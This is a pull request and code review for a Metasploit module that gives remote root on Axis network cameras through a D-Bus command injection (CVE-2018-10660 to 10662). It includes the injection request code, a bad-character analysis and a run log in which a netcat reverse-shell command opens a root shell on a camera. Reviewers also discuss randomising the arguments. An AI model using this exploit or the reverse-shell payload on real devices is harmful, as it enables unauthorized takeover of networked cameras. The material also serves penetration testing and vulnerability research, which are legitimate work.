### PR TITLE
Add root exploit for Axis network cameras

### PR DESCRIPTION
**Pull request by wvu**
# ~WIP~ Unblocked for this sprint

Currently only `cmd/unix/{reverse,bind}_netcat_gaping` (BusyBox) work. I'm specifying the `cmd/ifs` encoder manually at the moment.

**To-do:**

- [x] Perform badchar analysis on the injection and investigate other vectors
- [ ] ~Investigate randomizing the order/syntax of D-Bus arguments~ It's a network camera

```
msf5 exploit(linux/http/axis_srv_parhand_rce) > run

[*] Started reverse TCP handler on 192.168.1.55:4444
[*] nc${IFS}192.168.1.55${IFS}4444${IFS}-e${IFS}/bin/sh${IFS}
[*] Command shell session 1 opened (192.168.1.55:4444 -> 192.168.1.51:54316) at 2018-07-12 18:50:36 -0500

id
uid=0(root) gid=0(root)
uname -a
Linux axis-accc8e6991f9 4.1.0 #1 PREEMPT Thu Jul 7 11:06:57 CEST 2016 armv7l GNU/Linux
```

Tested on a **Companion Dome V** with version **6.15.4**.

### CODE REVIEW

File: modules/exploits/linux/http/axis_srv_parhand_rce.rb [hunk 1]
```diff
@@ -0,0 +1,96 @@
...
+
+    vprint_status(cmd)
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
+        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SetParameter string:root.Time.DST.Enabled string:;#{cmd};"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/axis_srv_parhand_rce.rb]: To-do: do badchar analysis on the injection and investigate other vectors. I know that doubled semicolons is a syntax error, for instance.

File: modules/exploits/linux/http/axis_srv_parhand_rce.rb [hunk 2]
```diff
@@ -0,0 +1,96 @@
...
+      }
+    )
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
+        'args'    => "--system --dest=com.axis.PolicyKitParhand --type=method_call /com/axis/PolicyKitParhand com.axis.PolicyKitParhand.SynchParameters"
```
Comment (wvu-r7) [inline modules/exploits/linux/http/axis_srv_parhand_rce.rb]: This line should be fine, but maybe we want to randomize the order/syntax of D-Bus arguments.

File: modules/exploits/linux/http/axis_srv_parhand_rce.rb [hunk 3]
```diff
@@ -0,0 +1,95 @@
...
+    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
+
+    vprint_status(cmd)
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
```
Comment (bcoles) [inline modules/exploits/linux/http/axis_srv_parhand_rce.rb]: Seeing as you're crafting D-Bus messages twice, may as well wrap it in a method.

[Here](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb#L98) is some pretty code for formatting D-Bus messages. It's designed for local exploitation, but can easily be reworked.

```ruby
  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end
```

`--print-reply` is optional, and may or may not be useful in this instance, depending whether the server returns a reply.

As for randomizing the arguments, it's unlikely that `#{path} #{interface} #{contents}` can be randomised. Not sure about `--system` and ` --dest=#{dest}`.

Comment (wvu-r7) [reply modules/exploits/linux/http/axis_srv_parhand_rce.rb]: > randomizing

> randomised

Comment (bcoles) [reply modules/exploits/linux/http/axis_srv_parhand_rce.rb]: Zmieniam słowniki, aby utrudnić analizę.

Comment (wvu-r7) [reply modules/exploits/linux/http/axis_srv_parhand_rce.rb]: I've created a method that's suitable for the exploit. The server doesn't return a reply. I was thinking of randomizing the order of arguments, but I think that's overkill for a network camera exploit.

**Comment by wchen-r7** [comment]
Did some badchar analysis. Out of the printable chars, these ones are bad:

```
\x20\x22\x24\x26\x27\x28\x3b\x3c\x3d\x3e\x5c\x60\x7c
```

**Comment by wvu-r7** [comment]
# Release Notes

This adds a remote root exploit against multiple Axis network camera models, leveraging CVE-2018-10660, CVE-2018-10661, and CVE-2018-10662.

**Pull request merged**